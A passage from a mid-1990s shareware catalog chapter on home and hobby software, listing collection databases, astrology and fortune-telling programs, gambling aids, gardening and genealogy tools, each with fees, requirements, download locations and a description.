MCBASE.ZIP on CompuServe in + CIS:COLLECT forum LIBrary 16 (or contact userID 100270,2132 for + assistance). + SWREG#: 1636 + PsL#: 11341 + Download size: 284k (about 21 minutes with a 2400 baud modem) + Description: + The music collection database system: a fully event driven, + mouse controlled, object oriented, dBaseIII+ compatible, + relational-to-the-max, windowing database management system, + with handy dialogs & picklists and very flexible configuration + preferences. The only REAL database system for the music + collector. XT, AT and protected-mode versions available. + + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 207. + + Product: ScrollZ + Author: , 816-429-3558 + Version: 2.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 3 months of unlimited + phone, fax, BBS, CompuServe, mail support; all ASP-wide offers + (see page 5); disks of other shareware; discounts on other + products. Lifetime free upgrading allowed. 99 free update + disk(s) sent out. + Look for: SCRLZ210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SCROLZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + Download size: 262k (about 20 minutes with a 2400 baud modem) + Description: + A great way to track all of your printed matter; be it + magazines, comics, books, graphic novels, newspapers, + newsletters, anything! All in one easy to use system. Input + screens designed with specific needs in mind, even a NoteZ + section for recording your own thoughts and comments! Prints + listings, catalogs, 3X5 or Rolodex cards, custom listings, and + even a statistical breakdown of your collection! Cross + reference by any of the fields or combination. Find by any + field or combination, even NoteZ! + + Chapter 15, "Home & hobby" 527 + + + + Product: SoundZ + Author: , 816-429-3558 + Version: 4.00 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Hard disk. IBM Graphics printer. + Strongly recommended: HP LaserJet printer; Mouse. + Registration fee: $45.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: SOUNDZ4.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SOUNDZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 63 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who have multiple formats for their + collections (cassettes, CDs, 45s, 78s, LPs, and reel to reels). + It is more in depth than any of the other audio program. So, if + you need more than a basic catalog then this is for you! + Standard entries for title, artist, reference number, category, + price/value, date of purchase, date of origin, unlimited number + of songs per side (with notes entries for each!), and a text + liner NoteZ field of up to 5000 lines. + + + Product: SoundZ For Windows + Author: , 816-429-3558 + Version: 2.15 (03-09-95) + Needs: IBM PC, Windows 3.0 or better. 330k RAM; CGA monitor; + Hercules monitor; Hard disk. IBM Graphics printer. + Strongly recommended: HP LaserJet printer; Mouse. + Registration fee: $45.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + + Chapter 15, "Home & hobby" 528 + + + + on other products. Lifetime free upgrading allowed. 99 free + update disk(s) sent out. + Look for: SDZW215.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SNDZW.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 3696 + Download size: 950k (about 71 minutes with a 2400 baud modem) + Description: + Designed for audiophiles who have multiple formats for their + collections (cassettes, CDs, 45s, 78s, LPs, and reel to reels). + It is more in depth than any of the other audio program. So, if + you need more than a basic catalog then this is for you! + Standard entries for title, artist, reference number, category, + price/value, date of purchase, date of origin, unlimited number + of songs per side (with notes entries for each!), and a text + liner NoteZ field of up to 5000 lines. Plus save scanned cover + art! + + + Product: VideoMaster + Author: , 816-429-3558 + Version: 9.00 (11-29-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: VIDM900.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 61 + Download size: 244k (about 18 minutes with a 2400 baud modem) + Description: + To help user catalog their video tapes and assist user in + printing catalogs, standard and user customized listings and + labels for the spine and front of the tape. Entries for tape + number, title, rating, start point, star, costar, three user + defined entries and up to 5000 line synopsis as well as + category. User can find any tape by any field or combination. + Can handle up to multiple titles on a single tape, file only + being limited by disk space. Great for the home video buff! + + Chapter 15, "Home & hobby" 529 + + + + Product: VideoMaster For Windows + Author: , 816-429-3558 + Version: 2.10 (03-09-95) + Needs: IBM AT (80286), Windows 3.0 or better. 330k RAM; CGA + monitor; Hercules monitor; Dual 720k floppy drives. IBM + Graphics printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 5); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: VIDW210.ZIP on BBSs (call 317-784-2147 to download it + at no charge); VIDM4W.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 4969 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + To help user catalog their video tapes and assist user in + printing catalogs, standard and user customized listings and + labels for the spine and front of the tape. Entries for tape + number, title, rating, start point, star, costar, three user + defined entries and up to 1000 line synopsis as well as + category. User can find any tape by any field or combination. + Can handle up to multiple titles on a single tape, file only + being limited by disk space. Great for the home video buff! + + + Product: The Wine Window + Author: , 309-682-8151 + Version: 1.2 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 2024k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; runtime license; LAN license; site + license; all ASP-wide offers (see page 5); discounts on other + products; discounts on upgrades. 6-month free upgrading + allowed. + Look for: availability unknown on BBSs; WWINSTAL.EXE on + CompuServe in CIS:WINSHARE forum LIBrary 19 (or contact userID + 72324,2434 for assistance). + Download size: 1419k (about 106 minutes with a 2400 baud modem) + Description: + A wine cellar management program that allows multiple cellars + or collections. Extensive graphing (ageing, value, soundness, + distributions, etc.). Multiple quality ratings. More than + + Chapter 15, "Home & hobby" 530 + + + + 2,000 producers pre-loaded. Fast, smart collection entry. Wine + value history. Demonstation cellar included. Written by a + software professional and avid wine collector. + + + 15.5 Fortune telling & astrology + + See also: Religion & philosophy. + + Product: ASTRO + Author: , 718-625-2262 + Version: 2.86 (11-19-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; EMS memory; math + coprocessor. + Registration fee: $39.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: AST286-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); AS286?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 584k (about 44 minutes with a 2400 baud modem) + Description: + The program for astrological analysis. A fun, full-featured, + easy-to-use astrology program for MS-DOS. Does natal + compatability and transits. Produces interpreted text and + graphics cartwheels. Supports most printers and word + processors. + + Chapter 15, "Home & hobby" 531 + + + + Product: ASTRO For Windows + Author: , 718-625-2262 + Version: 1.08 (11-19-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Dual 720k floppy drives; Hard disk; Mouse; XMS memory. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Plotter; Epson printer; + EMS memory; math coprocessor. + Registration fee: $44.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: ASW108-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); AW108?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 1024k (about 76 minutes with a 2400 baud modem) + Description: + The program for astrological analysis. A fun, full-featured, + easy-to-use astrology program for Windows. Does natal + compatability and transits. Produces interpreted text and + graphics cartwheels. Supports most printers and word + processors. + + + Product: By the Numbers + Author: + Version: 5.4a (07-28-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; discounts on upgrades. + Look for: NUMB54A.ZIP on BBSs; NUMBER.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10189 + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + Use the philosophy of Numerology to analyze your name & + birthdate for their symbolic meaning and metaphysical + vibrations, giving a complete personality profile. Uses + Pythagorean system, takes name changes into account, analyzes + 10 personality elements, provides forecast. Readings can be + saved, edited, printed. + + Chapter 15, "Home & hobby" 532 + + + + Product: clySmic Lunar Almanack + Moon's phase/place/times. See full description on page 519. + + Product: Crystal Ball + Author: + Version: 4.0 (05-12-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CRSTL40.ZIP on BBSs; CRYSTL.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Welcome to the world of the psychic computer! This tongue-in- + cheek program makes predictions and answers questions with a + sometimes enigmatic style reminiscent of the ancient Greek + oracles. You select the subject matter for predictions of + personal interest. This could explain where those crazy tabloid + headlines come from! + + + Product: ESPTEST + Parapsychology tool. See full description on page 478. + + Product: Fortune Teller + Author: + Version: 4.4 (10-02-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; discounts on other products; discounts on + upgrades. + Look for: FORT44.ZIP on BBSs; FORTUN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10249 + Download size: 290k (about 22 minutes with a 2400 baud modem) + Description: + A potpourri of fortune telling techniques includes three + playing card methods, dice, Numerology, Runes, and "Instant + Oracle". A history and explanation of each method appears in + the documentation. Also included is an ESP test. + + + Product: Geomancy + Ancient system of divination with black magic. See full + description on page 589. + + Chapter 15, "Home & hobby" 533 + + + + Product: I Ching Empower Tool + Author: + Version: 1.0 (05-02-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + Mouse. + Registration fee: $30.00 (add $6.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime CompuServe, mail support; 1-month + return policy; discounts on upgrades. Certification as Empower + Consultant with Pro version. + Look for: CHING.ZIP on BBSs; CHING.ZIP on CompuServe in + CIS:NEWBAGE forum LIBrary 2 (or contact userID 75363,1523 for + assistance). + SWREG#: 5719 + PsL#: 14045 + Download size: 1400k (about 104 minutes with a 2400 baud modem) + Description: + New interpretation of the 5,000-year-old I Ching gives you + answers to your most important, intimate questions by bringing + your reasoning, conscious mind in contact with your intuitive + subconscious. Gives a 360-degree view of your situation and + helps you develop greater creativity and flexibility in career, + relationships, conflict resolution, strategy, Self and spirit. + Great brainstorming tool. Highly graphic. Print and/or file + your readings. Two Help files, including full text of I Ching. + + + Product: Mayan Calendar + Author: + Version: 3.8a (12-27-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: MAYAN38.ZIP on BBSs; MAYAN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Uses the astronomical knowledge of the ancient Mayans to + convert a modern calendar date to its Mayan equivalent, and + then gives the Mayan astrological interpretation. Also uses + Julian period dates and will calculate from Mayan to modern + date. Has chart of Mayan and Aztec day and month names. Easy- + to-understand documentation and history of the Mayan calendar + included on disk. Norman Donaldson's excellent research is + explained in detail. + + Chapter 15, "Home & hobby" 534 + + + + Product: NUMERO UNO + Author: , 718-625-2262 + Version: 1.05 (11-19-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; EMS memory; math + coprocessor. + Registration fee: $39.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: NUM105-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); NU105?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 584k (about 44 minutes with a 2400 baud modem) + Description: + The program for numerological analysis. A fun, full-featured, + easy-to-use numerology program for MS-DOS. Does analysis of + birth date, birth name and current name. Produces interpreted + text reports, data report, and name transits and calendars. + Supports most printers and word processors. + + + Product: Personal Tarot + Author: + Version: 3.1 (10-04-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: TAROT31.ZIP on BBSs; TAROT.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10220 + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + Tarot cards have been used around the world throughout history + for fun and fortune. Now you can enjoy professional quality + Tarot readings on your PC! Automates shuffling and dealing, + builds a 10-card layout, and displays card descriptions and + meanings. You choose from different methods of shuffling and + + Chapter 15, "Home & hobby" 535 + + + + layout. You can edit card interpretations and add your own + comments. Readings can be saved, edited, printed. No graphics. + + + Product: The Richard Webster System + Read personalities like professional psychic. See full + description on page 565. + + Product: Wynter Stone's I Ching + Author: + Version: 1.2 (02-17-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: ICHNG12.ZIP on BBSs; ICHING.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10756 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + The I Ching is an ancient Chinese book used for both fortune + telling and philosophical insight. Toss coins or sticks to + create a pattern of 6 lines, forming a hexagram for + interpretation. You can edit the text for each hexagram and add + your own comments. Readings can be saved, edited, printed. + + + Product: Wynter Stone's Quick Guide + Author: + Version: 1.6 (11-17-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: WGUID16.ZIP on BBSs; WGUIDE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + If you've ever wondered what "New Age" really stands for, this + could help. It's an on-disk mini-encyclopedia of subjects + related to mystical experiences of various kinds. Both DOS and + Windows versions are included. Freeware. + + Chapter 15, "Home & hobby" 536 + + + + Product: Your ESP Test + Author: + Version: 1.5 (05-19-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: ESP15.ZIP on BBSs; ESP.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Find out if you have psyhcic powers, using three standard tests + to see if you have ESP (extra-sensory perception) potential. + Try precognition (seeing the future), clairvoyance (knowing + things unseen), or telekinesis (moving objects iwth your mind). + Lots of fun! + + + 15.6 Gambling + + See also: Games, Casino games; Home & hobby, Sports, + Handicapping; Home & hobby, Sports, Betting pools. + + Product: BlackJack! + Simulation of Blackjack - great learning aid. See full + description on page 600. + + Product: Lotto Challenger + Lottery analysis for Pick 5 and 6 lotteries. See full + description on page 554. + + Product: LOTTO MANIA + Lotto Manager for lottos based on six numbers. See full + description on page 555. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 580. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL Games. See full description + on page 580. + + Product: RoboCrap.v94 + Crap table simulator. See full description on page 606. + + Chapter 15, "Home & hobby" 537 + + + + Product: $mart Gambler + Author: , 702-342-0376 + Version: 1.6 (01-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $29.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 1-month return policy; bonus utilities. + Look for: SGAMB16.ZIP on BBSs (call 702-849-2209 to download it + at no charge); SGAMB.ZIP on CompuServe in CIS:PCNEW forum + LIBrary 9 (or contact userID 71360,72 for assistance); + SGAMB16.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID R.SCHOENBECK for assistance). + Download size: 342k (about 26 minutes with a 2400 baud modem) + Description: + For people who play to win! Explains and gives strategies for + choosing the best casinos, money management, gambling odds and + improving luck. All the popular games are covered in full + detail with the best possible strategies for each provided. + Planning features calculate bet sizes. Reporting features + collect your data and generate reports and graphs. Shows you + how to control your bankroll, analyze your play and best of all + better your results! + + + Product: Thoroughbred Handicapper Pro + Complete thoroughbred handicapping system. See full + description on page 574. + + Product: TURF.v93 + Thoroughbred handicapping system. See full description on + page 574. + + Product: ULTIMATE BACCARAT + Interactive animated Baccarat simulation. See full description + on page 607. + + Product: ULTIMATE BLACKJACK + Interactive animated blackjack simulation. See full + description on page 607. + + Product: Windows Lotto + Analysis & wheeling for Pick 5 & 6 lotteries. See full + description on page 556. + + Chapter 15, "Home & hobby" 538 + + + + 15.7 Gardening + + Product: Grow'Em + Author: , 506-849-7087 + Version: 3.0 (03-01-95) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: EMS memory. + Registration fee: $19.95 (Canadian dollars) (add $2.00 (Canadian + dollars) for shipping to U.S. addresses) (add $2.00 (Canadian + dollars) for shipping to Canadian addresses) (add $3.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; bonus data; bonus graphics; all ASP-wide offers (see + page 5); discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; GROW3V.EXE on CompuServe + in CIS:GARDENING forum LIBrary 11 (or contact userID 74471,1240 + for assistance). + SWREG#: 5335 + PsL#: 14161 + Download size: 868k (about 65 minutes with a 2400 baud modem) + Description: + Definitive program on propagating plants from seed, cuttings, + by layering, etc. Features over 200 species, most propagating + techniques in depth, and detailed info on growth media, + composting, cold frames, lighting, etc. Easy-to-use resource, + illustrated with sketches and digitized images, runs well under + DOS or Windows. Mouse or keyboard-driven + + + Product: HortMan + Author: , 408-377-0703 + Version: 1.0 (11-10-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $6.50 for shipping to Canadian addresses) (add + $8.50 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; bonus + utilities; all ASP-wide offers (see page 5). + Look for: availability unknown on BBSs. + Download size: 136k (about ten minutes with a 2400 baud modem) + Description: + A software management tool developed to bring the power of the + PC into the horticultural profession. The wise gardener keeps + an up-to-date notebook for all seasons. Retains your notes for + each plant and compile a list of task for each month of the + year. Can help organize other sources of information such as + books and periodicals. Exchange or distribute plant information + with associates and friends: it easily transfers plant + information to and from diskette. + + Chapter 15, "Home & hobby" 539 + + + + 15.8 Genealogy + + Product: Brother's Keeper + Author: + Version: 5.1 (02-01-93) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Hard disk. + Registration fee: $45.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, fax, BBS, CompuServe, GEnie, + mail support; 12-month return policy; discounts on upgrades. + Lifetime free upgrading allowed. 1 free update disk(s) sent + out. + Look for: BK5*.* on BBSs (multiple files) (call 616-364-1127 to + download it at no charge); BK5*.* on CompuServe in CIS:ROOTS + forum LIBrary 3 (multiple files) (or contact userID 75745,1371 + for assistance); BK5*.* on GEnie in GENEALOGY forum LIBrary 8 + (multiple files) (or contact userID J.STEED1 for assistance). + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + A full featured genealogy program which can store names, dates, + locations, and other information for up to 1,000,000 people. It + prints all the standard charts and reports and a few unique + ones. Reports include ancestor or pedigree charts, descendant + reports with relationships, graphic descendant tree, family + group sheets, alphabetical name lists, birthday lists, custom + designed reports, ahnentafel lists, graphic box charts, and a + descendant register report. Includes gedcom. + + + Product: CHRONOS + Interactive historical timelines. See full description on + page 473. + + Product: Cumberland Diary + Powerful diary/journal entry program. See full description on + page 149. + + Chapter 15, "Home & hobby" 540 + + + + Product: Cumberland Family Tree + Author: , 615-647-4012 + Version: 3.5 (01-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; CGA monitor; + Hard disk. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 2-month return policy; bonus utilities; all ASP-wide + offers (see page 5); discounts on other products. + Look for: availability unknown on BBSs; CTRE35.ZIP on CompuServe + in CIS:ROOTS forum LIBrary 3 (or contact userID 70713,3476 for + assistance). + Download size: 323k (about 24 minutes with a 2400 baud modem) + Description: + Powerful, easy-to-use genealogy program with pull-down menus + and extensive on-line help. Enter birth, death, marriages, + notes. Automatically keeps track of relationships. Surname + anywhere in name. Place names entered only once then selected + from pop-up window. Print pedigrees, family groups, + descendents, time line, lists, statistics and many more + reports. + + + Product: Cumberland Story + Author: , 615-647-4012 + Version: 1.2 (01-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; CGA monitor; + Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 2-month return policy; bonus utilities; all ASP-wide + offers (see page 5); discounts on other products. + Look for: availability unknown on BBSs; CSTY12.ZIP on CompuServe + in CIS:ROOTS forum LIBrary 3 (or contact userID 70713,3476 for + assistance). + Download size: 229k (about 17 minutes with a 2400 baud modem) + Description: + Write your own or your ancestors life story. Pull-down menus, + on-line help, word processor with cut & paste features. + Suggested or user-defined chapters and topics. ASCII import and + export. Multi-entry text search. Prompts help outline your + story with ideas of things to write about. + + Chapter 15, "Home & hobby" 541 + + + + Product: EZ-Tree + Author: , 216-659-9489 + Version: 2.30 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 1-month limited return + policy; LAN license; site license; bonus utilities; all ASP- + wide offers (see page 5); disks of other shareware; discounts + on other products. 1-month free upgrading allowed. + Look for: EZT230.ZIP on BBSs (call 216-661-9065 to download it at + no charge); EZT230.ZIP on CompuServe in CIS:ROOTS forum LIBrary + 3 (or contact userID 73057,3113 for assistance); EZT230.ZIP on + GEnie in GENEALOGY forum LIBrary 0. + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + A genealogy program that lets you keep track your family tree. + It can link family trees together and report on them in many + different formats. Can handle 16 marriages per person and 32 + children per couple, with an almost unlimited number of people + thanks to the new linking ability. By far, this is the easiest + genealogy program to use. It presents the family in an on- + screen tree structure. + + + Product: Family Calendar for Windows + Prints family oriented, quality wall calendar. See full + description on page 124. + + Product: OMNIDay + Daily diary program for up to 10 users. See full description + on page 151. + + Chapter 15, "Home & hobby" 542 + + + + 15.8.1 Pedigrees + + Product: Kith and Kin + Author: , +44-(0)1383-510597 + Version: 3.0 (09-04-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Registration fee: L-28.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus data; discounts on other products; discounts + on upgrades. + Look for: KK300.ZIP on BBSs (call +44-(0)1242-232623 to download + it at no charge); KITKIN.ZIP on CompuServe in CIS:ROOTS forum + LIBrary 2 (or contact userID 100101,1155 for assistance). + SWREG#: 2537 + PsL#: 11172 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Stores and documents family trees which will appeal to + genealogists and family historians. Features an easy to use + graphical interface and powerful multi-level editing tools. The + program supports date and place of births, marriages and deaths + as well as mutiple marriages and aliases for each person. + Pictures, diagrams, sounds, etc may be linked to a person or + family via Windows OLE. Imports and exports PAF GEDCOM files. + Prints drop-line trees and detail reports. + + Chapter 15, "Home & hobby" 543 + + + + Product: TreeDraw + Author: , +44-(0)1383-510597 + Version: 1.11 (09-04-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. Kith and Kin or other PAF GEDCOM comaptible + genealogy database. + Registration fee: L-20.00 